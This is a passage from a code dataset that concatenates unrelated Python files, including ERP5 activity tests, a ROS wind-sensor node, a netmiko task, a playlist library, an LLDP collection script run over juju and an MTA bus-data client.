activity_tool.removeNodeFromFamily(node_id, non_member)\n self.assertItemsEqual(activity_tool.getCurrentNodeFamilyNameSet(), [other])\n activity_tool.createFamily(does_not_exist)\n activity_tool.addNodeToFamily(node_id, does_not_exist)\n self.assertItemsEqual(activity_tool.getCurrentNodeFamilyNameSet(), [other, does_not_exist])\n activity_tool.deleteFamily(does_not_exist)\n self.assertItemsEqual(activity_tool.getCurrentNodeFamilyNameSet(), [other])\n self.assertItemsEqual(activity_tool.getFamilyNameList(), [other, non_member])\n activity_tool.renameFamily(other, member)\n self.assertItemsEqual(activity_tool.getFamilyNameList(), [member, non_member])\n self.assertItemsEqual(activity_tool.getCurrentNodeFamilyNameSet(), [member])\n activity_tool.createFamily(other)\n activity_tool.addNodeToFamily(node_id, other)\n self.assertItemsEqual(activity_tool.getFamilyNameList(), [member, non_member, other])\n self.assertItemsEqual(activity_tool.getCurrentNodeFamilyNameSet(), [member, other])\n activity_tool.deleteFamily(other)\n\n self.assertItemsEqual(activity_tool.getFamilyNameList(), [member, non_member])\n self.assertItemsEqual(activity_tool.getCurrentNodeFamilyNameSet(), [member])\n o = self.getOrganisation()\n for activity in 'SQLDict', 'SQLQueue':\n # Sanity check.\n self.assertEqual(self.getMessageList(activity), [])\n self.assertRaises(\n ValueError,\n o.activate, activity=activity, node=does_not_exist,\n )\n for node, expected in (member, '1'), (non_member, '0'), ('', '1'), ('same', '1'):\n o._setTitle('0')\n o.activate(activity=activity, node=node)._setTitle('1')\n self.commit()\n self.ticOnce()\n self.assertEqual(\n o.getTitle(),\n expected,\n (activity, o.getTitle(), expected),\n )\n if expected == '0':\n # The activity must still exist, waiting for a node of the\n # appropriate family.\n result = self.getMessageList(activity)\n self.assertEqual(len(result), 1)\n self.deleteMessageList(activity, result)\n\n def test_message_auto_validation(self):\n \"\"\"\n Test that messages without dependencies are directly spawned with\n processing_node=0.\n \"\"\"\n organisation = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n activity_tool = self.getActivityTool()\n organisation.activate(tag='1').getId()\n organisation.activate(tag='2', after_tag=None).getId()\n organisation.activate(tag='3', after_tag='foo').getId()\n self.commit()\n activity_tool.getMessageList()\n self.assertItemsEqual(\n [('1', 0), ('2', 0), ('3', -1)],\n [\n (x.activity_kw['tag'], x.processing_node)\n for x in self.getActivityTool().getMessageList()\n ],\n )\n self.tic()\n\n def test_activity_timeout(self):\n slow_method_id = 'Base_getSlowObjectList'\n createZODBPythonScript(\n self.portal.portal_skins.custom,\n slow_method_id,\n 'selection=None, **kw',\n \"\"\"\nfrom time import sleep\nsleep(3)\nreturn [x.getObject() for x in context.portal_catalog(limit=100)]\n \"\"\")\n\n # Set short enough activity timeout configuration\n import Products.ERP5Type.Timeout\n Products.ERP5Type.Timeout.activity_timeout = 2.0\n\n self.portal.portal_templates.activate().Base_getSlowObjectList()\n with self.assertRaises(RuntimeError):\n self.tic()\n message, = self.getMessageList('SQLDict')\n self.assertEqual(message.retry, 0)\n self.deleteMessageList(\n 'SQLDict',\n [message],\n )\n\n def test_zmi_views(self):\n # we can render ZMI view without errors or warnings\n with warnings.catch_warnings(record=True) as catched_warnings:\n self.portal.portal_activities.manage_overview()\n self.portal.portal_activities.manageActivities()\n self.portal.portal_activities.manageActivitiesAdvanced()\n self.portal.portal_activities.manageLoadBalancing()\n self.assertEqual(catched_warnings, [])\n\n @for_each_activity\n def testSpawnTimeUserGroupAndRoleUsedDuringExecution(self, activity):\n obj = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n # This user cannot be created by userfolder API, validating that activity\n # execution does not use it.\n # Using a PropertiedUser because it is the lowest-level class which has a\n # groups notion.\n artificial_user = PropertiedUser(\n id='this user does not exist',\n login='does not matter',\n ).__of__(self.portal.acl_users)\n artificial_user._addGroups(groups=('group 1', 'group 2'))\n artificial_user._addRoles(roles=('role 1', 'role 2'))\n initial_security_manager = getSecurityManager()\n def checkUserGroupAndRole(organisation_self):\n user = getSecurityManager().getUser()\n self.assertIs(type(aq_base(user)), PropertiedUser)\n self.assertEqual(aq_parent(user), aq_parent(artificial_user))\n self.assertEqual(user.getId(), artificial_user.getId())\n self.assertItemsEqual(user.getGroups(), artificial_user.getGroups())\n self.assertItemsEqual(user.getRoles(), artificial_user.getRoles())\n Organisation.checkUserGroupAndRole = checkUserGroupAndRole\n try:\n newSecurityManager(None, artificial_user)\n obj.activate(activity=activity).checkUserGroupAndRole()\n self.tic()\n finally:\n setSecurityManager(initial_security_manager)\n del Organisation.checkUserGroupAndRole\n\n @for_each_activity\n def test_dummyGroupMethodUser(self, activity):\n activity_tool = self.portal.portal_activities\n user_folder = self.portal.acl_users\n expected_user_list = [\n PropertiedUser(id='user1', login='user1').__of__(user_folder),\n PropertiedUser(id='user2', login='user2').__of__(user_folder),\n ]\n for index, user in enumerate(expected_user_list):\n user._addGroups(groups=['role %i' % index])\n context_list = [\n self.portal.organisation_module.newContent(portal_type='Organisation')\n for _ in expected_user_list\n ]\n self.tic()\n user_list = [None for _ in expected_user_list]\n def doSomething(self, index):\n user_list[index] = getSecurityManager().getUser()\n Organisation.doSomething = doSomething\n try:\n initial_security_manager = getSecurityManager()\n try:\n for index, (context, user) in enumerate(zip(\n context_list,\n expected_user_list,\n )):\n newSecurityManager(None, user)\n context.activate(\n activity=activity,\n group_method_id=None,\n ).doSomething(index=index)\n finally:\n setSecurityManager(initial_security_manager)\n self.tic()\n finally:\n del Organisation.doSomething\n self.assertEqual(\n [x.getRoles() for x in user_list],\n [x.getRoles() for x in expected_user_list],\n )\n","repo_name":"Nexedi/erp5","sub_path":"product/CMFActivity/tests/testCMFActivity.py","file_name":"testCMFActivity.py","file_ext":"py","file_size_in_byte":113448,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"75"} +{"seq_id":"14066948142","text":"# link: https://leetcode.com/problems/my-calendar-iii/\n# solution reference: https://leetcode.com/problems/my-calendar-iii/solution/\n\n# Sweep line algorithm\nfrom sortedcontainers import SortedDict\nclass MyCalendarThree:\n\n def __init__(self):\n self.diff = SortedDict()\n\n def book(self, start: int, end: int) -> int:\n self.diff[start] = self.diff.get(start, 0) + 1\n self.diff[end] = self.diff.get(end, 0) - 1\n\n cur = max_count = 0\n # to cummulate the count, the order matters here => use SortedDict\n for key in self.diff:\n cur += self.diff[key]\n max_count = max(max_count, cur)\n\n return max_count\n\n# Your MyCalendarThree object will be instantiated and called as such:\n# obj = MyCalendarThree()\n# param_1 = obj.book(start,end)\n","repo_name":"rbrn1999/leetcode-sol","sub_path":"problems/732. My Calendar III.py","file_name":"732. My Calendar III.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32854228101","text":"import glob\nimport pandas as pd\nimport json\nfrom datetime import datetime\nimport os\nimport re\n\ndef normalize_tweet(tweet):\n if isinstance(tweet, str):\n tweet = tweet.lower()\n tweet = re.sub(r\"@[^\\s]+\", \"@user\", tweet) # Replace mentions with \"@user\"\n tweet = re.sub(r\"https?://[^\\s]+\", \"link\", tweet) # Replace URLs with \"link\"\n tweet = \" \".join(tweet.split()) # Remove extra whitespace\n else:\n tweet = str(tweet)\n\n return tweet\n\ndef process_files(folder_path, output_folder):\n # Retrieve file paths from the folder\n file_paths = glob.glob(folder_path)\n\n # Iterate over the file paths\n for file_path in file_paths:\n # Read the CSV file into a DataFrame\n df = pd.read_csv(file_path)\n\n # Apply the normalization function to each tweet\n df['normalized_tweet'] = df['full_text'].apply(normalize_tweet)\n\n # Print the first normalized tweet for demonstration\n print(df['normalized_tweet'][0])\n\n # Drop duplicates based on all columns\n df.drop_duplicates(keep='first', inplace=True)\n\n # Change the name of the file from \"staged\" to \"trusted\"\n file_name = os.path.basename(file_path)\n new_file_name = file_name.replace(\"staged\", \"trusted\")\n output_file = os.path.join(output_folder, new_file_name)\n\n # Save the DataFrame to a new CSV file\n df.to_csv(output_file, index=False)\n\ndef run_normalization(folder_path, output_folder):\n normalize_tweet(None)\n process_files(folder_path, output_folder)","repo_name":"Silly-Machine/twitter-data-engineering","sub_path":"src/data_normalization.py","file_name":"data_normalization.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1098640982","text":"#!/usr/bin/env python\n\nimport rospy\nfrom geometry_msgs.msg import Vector3Stamped\nfrom std_msgs.msg import Float64\nfrom wind_sensor.wind_sensor import WindSensor\nimport subprocess as sp\n\n\nclass WindSensorTalker:\n def __init__(self):\n \"\"\"\n Initializes the WindSensor class that is defined in wind_sensor.py\n \"\"\"\n self.wnd = WindSensor()\n\n def talker(self):\n \"\"\"\n Initializes the 4 publishers(wind_pub, rpy_pub, temp_pub, battery_pub), then initializes the node\n as wind_sensor_node and sets the rate to the users defined value(8 is the max of the wind sensor) then sleeps to\n let the startup and bluetooth connection finish.\n\n Makes function calls to gather the sensor readings from the wind sensor and saves the to the correct formats for\n publishing with a check at the end that the bluetooth connectivity is still up and if it is not the connection\n is reset and a small sleep to wait for it to establish before continuing.\n \"\"\"\n wind_pub = rospy.Publisher('wind_sensor/wind_vector', Vector3Stamped, queue_size=10)\n rpy_pub = rospy.Publisher('wind_sensor/roll_pitch_yaw', Vector3Stamped, queue_size=10)\n temp_pub = rospy.Publisher('wind_sensor/temperature', Float64, queue_size=10)\n battery_pub = rospy.Publisher('wind_sensor/battery_voltage', Float64, queue_size=10)\n rospy.init_node('wind_sensor_node', anonymous=True, log_level=rospy.get_param(\"log_level\", rospy.INFO))\n rate = rospy.Rate(8) # refresh rate in hz\n rospy.sleep(5)\n while not rospy.is_shutdown():\n self.wnd.update()\n wind_vector = self.wnd.get_wind_vector()\n vec_msg = Vector3Stamped()\n vec_msg.header.stamp = rospy.Time.now()\n vec_msg.vector.x = -wind_vector[0]\n vec_msg.vector.y = -wind_vector[1]\n vec_msg.vector.z = 0\n\n rpy_vector = self.wnd.get_rpy()\n rpy_msg = Vector3Stamped()\n rpy_msg.header.stamp = rospy.Time.now()\n rpy_msg.vector.x = -rpy_vector[0]\n rpy_msg.vector.y = rpy_vector[1]\n rpy_msg.vector.z = -rpy_vector[2]\n\n battery_msg = Float64()\n battery_msg = self.wnd.get_battery_charge()\n\n temp_msg = Float64()\n temp_msg = self.wnd.get_temp()\n temp_msg -= 273.15 # convert to celsius from kelvin\n stdoutdata = sp.getoutput(\"hcitool con\")\n if \"DC:73:74:12:94:80\" not in stdoutdata.split():\n rospy.logerr(\"Connection Failed, Reconnecting!\")\n self.wnd.close()\n self.wnd = WindSensor()\n rospy.sleep(5)\n wind_pub.publish(vec_msg)\n rpy_pub.publish(rpy_msg)\n battery_pub.publish(battery_msg)\n temp_pub.publish(temp_msg)\n rate.sleep()\n\n\nif __name__ == '__main__':\n wnd = WindSensorTalker()\n try:\n wnd.talker()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"AutoSail-MDH/AutoSailROS","sub_path":"autosail/scripts/drivers/wind_sensor_node.py","file_name":"wind_sensor_node.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"41588407926","text":"plotfilename=\"../files/matplotlib-3d-example.png\"\ninfile = \"../files/genfromtxt_example_data.txt\"\noufile = \"../files/genfromtxt_example_plot.png\"\nimport numpy\nimport matplotlib\nimport matplotlib.pyplot\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef randrange(n, vmin, vmax):\n return (vmax - vmin)*numpy.random.rand(n) + vmin\n\ndata = numpy.genfromtxt(infile, comments=\"#\", delimiter=\"\\t\", skip_header=3)\nfig = matplotlib.pyplot.figure()\nax = fig.add_subplot(111, projection='3d')\nn = data.shape[0]\n# plot a sphere for each particle\n# colour charged particles red (charge>0), blue (charge<0) and neutrals green\nblues = data[data[:,7]<0]\nreds = data[data[:,7]>0]\ngreens=data[numpy.logical_not(numpy.logical_or(data[:,7]<0,data[:,7]>0))]\nax.scatter(blues[:,0], blues[:,1], blues[:,2], c=\"b\", edgecolors=\"face\",\n marker=\"o\", s=blues[:,6])\nax.scatter(reds[:,0], reds[:,1], reds[:,2], c=\"r\", edgecolors=\"face\",\n marker=\"o\", s=greens[:,6])\nax.scatter(greens[:,0], greens[:,1], greens[:,2], c=\"g\", edgecolors=\"face\",\n marker=\"o\", s=greens[:,6])\nax.quiver(blues[:,0], blues[:,1], blues[:,2], blues[:,3], blues[:,4],\n blues[:,5], pivot=\"tail\")\nax.quiver(reds[:,0], reds[:,1], reds[:,2], reds[:,3], reds[:,4],\n reds[:,5], pivot=\"middle\")\nax.quiver(greens[:,0], greens[:,1], greens[:,2], greens[:,3], greens[:,4],\n greens[:,5], pivot=\"tip\")\nax.set_xlabel('X Label')\nax.set_ylabel('Y Label')\nax.set_zlabel('Z Label')\nmatplotlib.pyplot.savefig(oufile)\nprint(oufile, end=\"\")\n","repo_name":"COSMOS-CTC-Cambridge/damtp-research-programming","sub_path":"codes/python/genfromtxt_example_plot.py","file_name":"genfromtxt_example_plot.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"} +{"seq_id":"14710490296","text":"from typing import Sequence, Union, List, Any\nfrom nornir.core.task import Result, Task\nfrom nornir_netmiko.connections import CONNECTION_NAME\n\n\ndef netmiko_multiline(\n task: Task,\n commands: Sequence[Union[str, List[str]]],\n use_timing: bool = False,\n enable: bool = False,\n **kwargs: Any\n) -> Result:\n \"\"\"\n Execute Netmiko send_multiline method (or send_multiline_timing)\n\n Arguments:\n commands: List or list of lists (see Netmiko send_multiline)\n use_timing: Set to True to switch to send_multiline_timing method.\n enable: Set to True to force Netmiko .enable() call.\n kwargs: Additional arguments to pass to send_multiline method.\n\n Returns:\n Result object with the following attributes set:\n * result: String result showing you the output from commands\n \"\"\"\n net_connect = task.host.get_connection(CONNECTION_NAME, task.nornir.config)\n if enable:\n net_connect.enable()\n if use_timing:\n result = net_connect.send_multiline_timing(commands, **kwargs)\n else:\n result = net_connect.send_multiline(commands, **kwargs)\n return Result(host=task.host, result=result)\n","repo_name":"ktbyers/nornir_netmiko","sub_path":"nornir_netmiko/tasks/netmiko_multiline.py","file_name":"netmiko_multiline.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"75"} +{"seq_id":"17046472764","text":"import datetime\nimport random\nimport json\nimport mutagen\nimport os\n\nclass Song:\n\n\tdef __init__(self, title, artist, album, length):\n\t\tself.title = title\n\t\tself.artist = artist\n\t\tself.album = album\n\t\tself.length = length\n\n\t@property\n\tdef is_valid_length(self):\n\t\ti = 0\n\t\twhile i < len(self.length):\n\t\t\tif not self.length[i].isdigit() and not self.length[i] == ':':\n\t\t\t\t\treturn False\n\t\t\ti += 1\n\n\t\tarray = self.length.split(':')\n\t\ti = 0\n\t\twhile i < len(array):\n\t\t\tif array[i] < '0' or array[i] > '59':\n\t\t\t\treturn False\n\t\t\ti += 1\n\t\tif len(array) == 2:\n\t\t\tif int(array[0]) >= 0 and int(array[1]) > 0 and int(array[1]) < 60:\n\t\t\t\t\treturn True\n\n\t\tif len(array) == 3:\n\t\t\tif int(array[0]) > 0 and int(array[1]) > 0 and int(array[1]) < 60 and int(array[2]) > 0 and int(array[2]) < 60:\n\t\t\t\t\treturn True\n\n\tdef __str__(self):\n\t\tif self.is_valid_length:\n\t\t\treturn \"{} {} '{}' {}\".format(self.title, self.artist, self.album, self.length)\n\t\traise Exception(\"Invalid length !!!\")\n\n\tdef __repr__(self):\n\t\treturn str(self)\n\n\tdef __eq__(self, other):\n\t\treturn self.title == other.title and self.artist == other.artist and self.album == other.album and self.length == other.length\n\n\tdef __hash__(self):\n\t\treturn hash((self.title, self.artist, self.album, self.length))\n\t\n\tdef get_length(self, seconds = False, minutes = False, hours = False):\n\t\ttime_parts = self.length.split(':')\n\t\tif len(time_parts) == 2:\n\t\t\tlength_in_seconds = int(time_parts[1]) + int(time_parts[0])*60\n\t\t\tlength_in_minutes = int(time_parts[0])\n\t\t\tlength_in_hours = 0\n\t\tif len(time_parts) == 3:\n\t\t\tlength_in_hours = int(time_parts[0])\n\t\t\tlength_in_minutes = int(time_parts[0])*60 + int(time_parts[1])\n\t\t\tlength_in_seconds = int(time_parts[2]) + int(length_in_minutes*60)\n\t\tif seconds:\n\t\t\treturn length_in_seconds\n\t\tif minutes:\n\t\t\treturn length_in_minutes\n\t\tif hours:\n\t\t\treturn length_in_hours\n\t\telse:\n\t\t\treturn(str(self.length))\n\nclass Playlist:\n\n\tdef __init__(self, name, repeat=False, shuffle=False):\n\t\tself.name = name\n\t\tself.repeat = repeat\n\t\tself.shuffle = shuffle\n\t\tself.songs = []\n\t\tself.songs_location = {}\n\t\tself.song_ind = 0\n\n\tdef add_song(self, song):\n\t\tif isinstance(song, Song):\n\t\t\tself.songs.append(song)\n\t\treturn self.songs\n\n\tdef remove_song(self, song):\n\t\ti = 0\n\t\twhile self.songs[i] != song:\n\t\t\ti += 1\n\t\tj = i\n\t\twhile j < len(self.songs)-1:\n\t\t\tself.songs[j]=self.songs[j+1]\n\t\t\tj += 1\n\n\t\tself.songs = self.songs[0:len(self.songs)-1]\n\t\treturn self.songs\n\n\tdef total_length(self):\n\t\ttotal = \"\"\n\t\thours = 0\n\t\tminutes = 0\n\t\tseconds = 0\n\t\tfor i in range(0, len(self.songs)):\n\t\t\tcurrent_time_array = self.songs[i].length.split(':')\n\t\t\tif len(current_time_array)==2:\n\t\t\t\tminutes += int(current_time_array[0])\n\t\t\t\tseconds += int(current_time_array[1])\n\t\t\tif len(current_time_array)==3:\n\t\t\t\thours += int(current_time_array[0])\n\t\t\t\tminutes += int(current_time_array[1])\n\t\t\t\tseconds += int(current_time_array[2])\n\t\ts = seconds % 60\n\t\tnew_m = (seconds - s)//60\n\t\tminutes += new_m\n\t\tm = minutes % 60\n\t\tnew_h = (minutes - m)//60\n\t\thours += new_h\n\t\tif hours > 0:\n\t\t\ttotal += str(hours) + \":\"\n\t\ttotal += str(m) + \":\" + str(s)\n\n\t\treturn total\n\n\tdef artists(self):\n\t\tdata = []\n\t\tfor i in range(0, len(self.songs)):\n\t\t\tartist = self.songs[i].artist\n\t\t\tsong = self.songs[i].title\n\t\t\tdata.append((artist, song))\n\t\thist = {}\n\t\tfor i in data:\n\t\t\thist[i] = hist.get(i,0)+1\n\t\tresult_hist = {}\n\t\tfor i in hist:\n\t\t\tresult_hist[i[0]] = hist[(i[0],i[1])]\n\n\t\treturn result_hist\n\n\tdef next_song(self):\n\t\tif self.song_ind == len(self.songs) - 1:\n\t\t\tif self.repeat == True:\n\t\t\t\tself.song_ind = 0\n\n\t\tif self.shuffle == True:\n\t\t\tself.song_ind = random.randint(0, len(self.songs)-1)\n\t\t\t\n\t\treturn self.songs[self.song_ind]\n\n\n\tdef print_playlist(self):\n\t\tprint(\"| \", \"Artist \", \" | \", \" Song \", \" | \", \" Length \", \" |\" )\n\t\tprint(\"|\", \"--------\", \" | \", \"------------------\", \" | \", \"--------\", \" |\" )\n\t\tfor i in range(0,len(self.songs)):\n\t\t\tres = \"| \" + str(self.songs[i].artist)+ \" | \"\n\t\t\ttitle_space = len(\"------------------\")- len(str(self.songs[i].title))\n\t\t\tres += str(self.songs[i].title)\n\t\t\twhile title_space > 0:\n\t\t\t\tres += \" \"\n\t\t\t\ttitle_space -= 1\n\t\t\tres += \" | \"\n\n\t\t\ttitle_space = len(\"-------- \")- len(str(self.songs[i].length))\n\t\t\tres += str(self.songs[i].length)\n\t\t\twhile title_space > 0:\n\t\t\t\tres += \" \"\n\t\t\t\ttitle_space -= 1\n\t\t\tres += \" |\"\n\n\t\t\tprint(res)\n\n\n\tdef save(self):\n\t\td = {}\n\t\tfor i in range(0, len(self.songs)):\n\t\t\tdata = {}\n\t\t\tdata[\"title\"] = self.songs[i].title\n\t\t\tdata[\"artist\"] = self.songs[i].artist\n\t\t\tdata[\"album\"] = self.songs[i].album\n\t\t\tdata[\"length\"] = self.songs[i].length\n\t\t\td[i] = data\n\t\t\n\t\tfilename = \"\"\n\t\tfor i in range(0, len(self.name)):\n\t\t\tif self.name[i]==\" \":\n\t\t\t\tfilename += \"-\"\n\t\t\telse:\n\t\t\t\tfilename += self.name[i]\n\t\tfilename += \".json\"\n\t\twith open(filename,'w') as f:\n\t\t\tjson.dump(d,f)\n\t\treturn filename\n\n\t@classmethod\n\tdef load(file_name):\n\t\twith open(file_name, 'r') as f:\n\t\t\tcontent = json.load(f)\n\t\t\tplaylist = Playlist(content[\"name\"])\n\t\t\tfor song in content[\"songs\"]:\n\t\t\t\tnew_song = Song(\n\t\t\t\t\tartist=song[\"artist\"], title=song[\"title\"], album=song[\"album\"], length=song[\"length\"])\n\t\t\t\tplaylist.add_song(new_song)\n\t\t\treturn playlist\n\n\tdef add_location(self, song, location):\n\t\tself.songs_location[song] = location\n\n\nclass MusicCrawler:\n\n\tdef __init__(self, path):\n\t\tself.path = path\n\n\tdef get_info(self, data):\n\t\tsong_data = {}\n\t\tsong_data[\"artist\"] = data.get([\"ARTIST\"].text[0], \"Unknown\")\n\t\tsong_data[\"album\"] = data.get([\"ALBUM\"].text[0], \"Unknown\")\n\t\tsong_data[\"title\"] = data.get([\"TITLE\"].text[0], \"Unknown\")\n\t\ttry:\n\t\t\tsong_data[\"length\"] = str(\n\t\t\t\tdatetime.timedelta(seconds=data.info.length//1))[2:]\n\t\texcept:\n\t\t\tsong_data[\"length\"] = \"Unknown\"\n\t\treturn song_data\n\n\tdef generate_playlist(self, name):\n\t\tplaylist = Playlist(name)\n\t\tsongs = [mp3 for mp3 in os.listdir(self.path) if mp3.endswith(\".mp3\")]\n\t\tfor song in songs:\n\t\t\tdata = mutagen.File(self.path + \"/\" + song)\n\t\t\tinfo = self.get_info(data)\n\t\t\tnew_song = Song(\n\t\t\t\tartist=info[\"artist\"], title=info[\"title\"], album=info[\"album\"], length=info[\"length\"])\n\t\t\tplaylist.add_song(new_song)\n\t\t\tplaylist.add_location(new_song, self.path + \"/\" + song)\n\t\treturn playlist\n","repo_name":"angelavelinova/Programming-101","sub_path":"week05/03.MusicLibrary/music_library.py","file_name":"music_library.py","file_ext":"py","file_size_in_byte":6131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29240514382","text":"#!/usr/bin/python3\n\nimport json\nimport os\nimport shutil\nimport tempfile\nimport subprocess\nfrom optparse import OptionParser\n\ndef get_model_machies():\n raw = subprocess.check_output('juju machines --format json',shell=True)\n ret = []\n json_machines = json.loads(raw)\n for id in json_machines['machines']:\n name = json_machines['machines'][id]['display-name']\n ret.append( (id,name) )\n return ret\n\ndef write_collector_script(install_lldp = True):\n ftmp, ftmpname = tempfile.mkstemp()\n header = \"#!/bin/bash\\n\"\n install = \"\"\"\n for interface in `ls /sys/kernel/debug/i40e`\n do echo \"lldp stop\" > /sys/kernel/debug/i40e/${interface}/command\n done\n apt install lldpd -y;\n \"\"\"\n collect = \"lldpcli show neighbors details -f json > /tmp/lldp_output.json\\n\"\n body = header\n if install_lldp:\n body += install\n body += \"\\n\"\n body += collect\n os.write(ftmp,body.encode('utf-8'))\n os.close(ftmp)\n return ftmpname\n\ndef copy_script(machine, script_name):\n subprocess.run(\"juju scp {script_name} {machine}:{script_name}\".format(machine = machine, script_name = script_name), shell = True)\n\ndef run_script(machine, script_name):\n subprocess.run(\"juju ssh {machine} \\\"chmod 700 {script_name}; sudo {script_name}; rm {script_name}\\\"\"\n .format(machine = machine, script_name = script_name), shell = True)\n\ndef collect_data(machine_id, hostname, work_dir):\n subprocess.run(\"juju scp {machine_id}:/tmp/lldp_output.json {work_dir}/{hostname}.json\"\n .format(machine_id = machine_id, hostname = hostname, work_dir = work_dir), shell = True)\n\ndef main(options):\n if os.path.isdir(options.work_dir):\n shutil.rmtree(options.work_dir)\n os.mkdir(options.work_dir)\n script_name = write_collector_script(options.install_lldp)\n for machine in get_model_machies():\n id = machine[0]\n hostname = machine[1]\n copy_script(id, script_name)\n run_script(id, script_name)\n collect_data(id, hostname, options.work_dir)\n os.remove(script_name)\n\nif __name__ == \"__main__\":\n usage = \"usage: %prog [options] arg1 arg2\"\n parser = OptionParser(usage=usage)\n parser.add_option(\"-d\", \"--dir\",\n action=\"store\", type=\"string\", dest=\"work_dir\", default=\"/tmp/lldp\", help=\"Output directory\")\n parser.add_option(\"-i\", \"--install\",\n action=\"store_true\", dest=\"install_lldp\", default=False, help=\"Install LLDP tools first\") \n (options, args) = parser.parse_args() \n main(options)","repo_name":"majduk/net-surveyor","sub_path":"collect-lldp-juju.py","file_name":"collect-lldp-juju.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"} +{"seq_id":"1729943712","text":"'''\nGiven two arrays X and Y of positive integers, find number of pairs such that xy > yx (raised to power of) where x is an element from X and y is an element from Y.\n\nInput:\nThe first line of input contains an integer T, denoting the number of test cases. Then T test cases follow. Each test consists of three lines. The first line of each test case consists of two space separated M and N denoting size of arrays X and Y respectively. The second line of each test case contains M space separated integers denoting the elements of array X. The third line of each test case contains N space separated integers denoting elements of array Y.\n\nOutput:\nCorresponding to each test case, print in a new line, the number of pairs such that xy > yx.\n\nConstraints:\n1 ≤ T ≤ 100\n1 ≤ M, N ≤ 105\n1 ≤ X[i], Y[i] ≤ 103\n\nExample:\nInput\n1\n3 2\n2 1 6\n1 5\n\nOutput\n3\n'''\n#DCP11\ndef comopare_power(a,b,m,n):\n count = 0\n for i in range(len(a)):\n for j in range(len(b)):\n if pow(a[i],b[j])>pow(b[j],a[i]):\n count += 1\n return count\n\nif __name__ == \"__main__\":\n ans = 0\n ans_list = []\n test_cases = int(input())\n for i in range(test_cases):\n n , m = map(int,input().split())\n a = list(map(int,input().split()))\n b = list(map(int,input().split()))\n ans = comopare_power(a,b,m,n)\n ans_list.append(ans)\n for i in range(test_cases): \n print(ans_list[i], end = \" \")\n","repo_name":"Keshav-Asopa/Daily_Coding_Problem","sub_path":"DCP11.py","file_name":"DCP11.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10937614650","text":"# Author: Andrew Nell 2017/09/27 \n# HW2-Assignment 2\n\n###############################################################################\n\n# Code developed to pull information for a specific bus line from the MTA Bus\n# API and output all current vehicles coordinates and next stops and status\n\n###############################################################################\n\n# Imports to run code\nfrom __future__ import print_function\nimport sys\nimport json\n\ntry: \n import urllib2 as urllib\nexcept ImportError:\n import urllib.request as urllib # F. Bianco Reference 1\n\n###############################################################################\n# Import data from API \n\n# Ensure correct number of arguments entered \nif not len(sys.argv) == 4:\n print (\"Invalid number of arguments. Run as: python get_bus_info_adn\"\n \"323.py .csv\")\n sys.exit() # F. Bianco Reference 2\n\n# Define arguments\nkey, bus_line, outputfile = sys.argv[1], sys.argv[2], sys.argv[3]\n\n# Pull data from API using Key and Bus Line\ntry:\n url = (\"http://bustime.mta.info/api/siri/vehicle-monitoring.json?key=\"\n \"%s&VehicleMonitoringDetailLevel=calls&LineRef=%s\"%(key, bus_line))\n response = urllib.urlopen(url)\n data = response.read().decode(\"utf-8\")\n data = json.loads(data)\nexcept urllib.HTTPError:\n print(\"Invalid key and url. Please try again. Run as: python \" \n \"get_bus_info_adn323.py .csv\")\n sys.exit()\n\n###############################################################################\n# Define variables for output including Total Vehicles, Latitudes, longitudes \n# next stops and status for each vehicle and then print variables out and \n# create .csv file and start printing output into .csv\n\n# Define Number of vehicles\ntry:\n NoOfVehicles = (len(data['Siri']['ServiceDelivery']\n ['VehicleMonitoringDelivery'][0]['VehicleActivity']))\nexcept KeyError:\n print(\"Bus line does not exist or input invalid. Run as: \" \n \"python get_bus_info_adn323.py \")\n sys.exit()\n\n# create.csv \nfout = open(sys.argv[3], \"w\")\nfout.write(\"Latitude,Longitude,Stop Name,Stop Status\\n\")\n\n# Define latitude, longitutde, Next stop and statu of each bus and print \n# out in .CSV\nfor i in range(NoOfVehicles):\n \n # Define latitutde and Longitude\n \n latitude = (data['Siri']['ServiceDelivery']['VehicleMonitoringDelivery']\n [0]['VehicleActivity'][i]['MonitoredVehicleJourney']\n ['VehicleLocation']['Latitude'])\n \n longitude = (data['Siri']['ServiceDelivery']['VehicleMonitoringDelivery']\n [0]['VehicleActivity'][i]['MonitoredVehicleJourney']\n ['VehicleLocation']['Longitude']) \n \n # Define Next stop and account for errors\n try:\n\n stopname = (data['Siri']['ServiceDelivery']\n ['VehicleMonitoringDelivery'][0]['VehicleActivity'][i]\n ['MonitoredVehicleJourney']['OnwardCalls']['OnwardCall'][0]\n ['StopPointName'])\n except KeyError:\n stopname = \"N/A\"\n \n # Define status and account for errors \n try:\n\n stopstatus = (data['Siri']['ServiceDelivery']\n ['VehicleMonitoringDelivery'][0]['VehicleActivity'][i]\n ['MonitoredVehicleJourney']['OnwardCalls']['OnwardCall']\n [0]['Extensions']['Distances']['PresentableDistance'])\n except KeyError:\n stopstatus = \"N/A\"\n \n # Print outputs in desired format into .csv\n fout.write(str(latitude) + \",\" + str(longitude) + \",\" + str(stopname) + \n \",\" + str(stopstatus) + \"\\n\")\n\n\n\n###############################################################################\n\n# References \n\n# 1\n# F. Bianco, APIreadingJson.py.ipynb, access at: \n# https://github.com/fedhere/PUI2017_fb55/blob/master/Lab2_fb55/APIreadingJso\n# n.py.ipynb on 2017/09/27\n\n# 2 \n# F. Bianco, aSimplePythonThatWritesToCSV.py, access at: \n# 